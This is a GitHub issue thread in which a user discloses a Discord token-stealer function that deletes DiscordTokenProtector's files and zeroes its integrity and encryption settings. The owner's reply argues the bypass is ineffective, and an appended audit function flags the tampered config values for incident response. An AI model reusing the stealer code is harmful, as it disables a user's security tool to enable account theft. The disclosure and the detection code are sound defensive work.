Bypass found in the wild #60

Open
CanadaHonk opened this issue Oct 2, 2022 · 1 comment

@CanadaHonk

bypass_token_protector() {
            for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
                if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
                    client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
                }
            }
            const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
                encoding: "utf-8"
            }))
            token_protector_config['auto_start'] = false
            token_protector_config['auto_start_discord'] = false
            token_protector_config['integrity'] = false
            token_protector_config['integrity_allowbetterdiscord'] = false
            token_protector_config['integrity_checkexecutable'] = false
            token_protector_config['integrity_checkhash'] = false
            token_protector_config['integrity_checkmodule'] = false
            token_protector_config['integrity_checkscripts'] = false
            token_protector_config['integrity_checkresource'] = false
            token_protector_config['integrity_redownloadhashes'] = false
            token_protector_config['iterations_iv'] = 0
            token_protector_config['iterations_key'] = 0
            token_protector_config['version'] = 0
            client.requires.fs.writeFileSync(
                `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
                JSON.stringify(
                    token_protector_config,
                    null, 4
                )
            )
        }

GLHF

@andro2157
Owner

I've seen similar "bypasses" in the wild. Overall (including this one), they only work if:

  • DTP is not running, and in this case, they can only get the token through social engineering (making you relogin without DTP). The config changes are useless as these critical configs have been moved to the encrypted container.
  • If they run using admin privilege. If you allow a program to run using admin privilege you can safely assume that your token can be easily compromised. DTP cannot block attacks with admin privilege since it is in user land.

In this case, the config change, even if successful, won't do anything.

TLDR: useless bypass that won't do much.
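For incident response, the writes made by the snippet in this issue can serve as an indicator that a stealer ran on the machine, even though the reply above says they do not weaken DTP. The following is an added example, not code from DTP or from either commenter: `auditDtpConfig`, `TAMPER_VALUES` and `STRONG_KEYS` are hypothetical names, and treating zeroed `iterations_*`/`version` values as abnormal is an assumption.

```javascript
// Values the posted snippet writes into DiscordTokenProtector\config.json.
const TAMPER_VALUES = {
  auto_start: false,
  auto_start_discord: false,
  integrity: false,
  integrity_allowbetterdiscord: false,
  integrity_checkexecutable: false,
  integrity_checkhash: false,
  integrity_checkmodule: false,
  integrity_checkscripts: false,
  integrity_checkresource: false,
  integrity_redownloadhashes: false,
  iterations_iv: 0,
  iterations_key: 0,
  version: 0,
};

// Assumption: a working install never has zero iteration counts or version 0,
// whereas a user may legitimately switch off individual boolean options.
const STRONG_KEYS = ["iterations_iv", "iterations_key", "version"];

// Takes the raw text of config.json and reports which keys carry the
// values from the snippet. Never throws on malformed input.
function auditDtpConfig(rawJson) {
  let config;
  try {
    config = JSON.parse(rawJson);
  } catch (err) {
    return { verdict: "unreadable", matched: [], strong: [] };
  }
  if (config === null || typeof config !== "object" || Array.isArray(config)) {
    return { verdict: "unreadable", matched: [], strong: [] };
  }
  const keys = Object.keys(TAMPER_VALUES);
  const matched = keys.filter(
    (k) => Object.prototype.hasOwnProperty.call(config, k) && config[k] === TAMPER_VALUES[k]
  );
  const strong = matched.filter((k) => STRONG_KEYS.includes(k));
  let verdict = "no-match";
  if (matched.length === keys.length) verdict = "tampered"; // full signature
  else if (strong.length > 0) verdict = "suspicious";      // partial overwrite
  return { verdict, matched, strong };
}
```

A `tampered` or `suspicious` verdict says that something rewrote the file, so the host should be treated as compromised and the Discord token rotated; it says nothing about whether DTP's protection was actually disabled.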
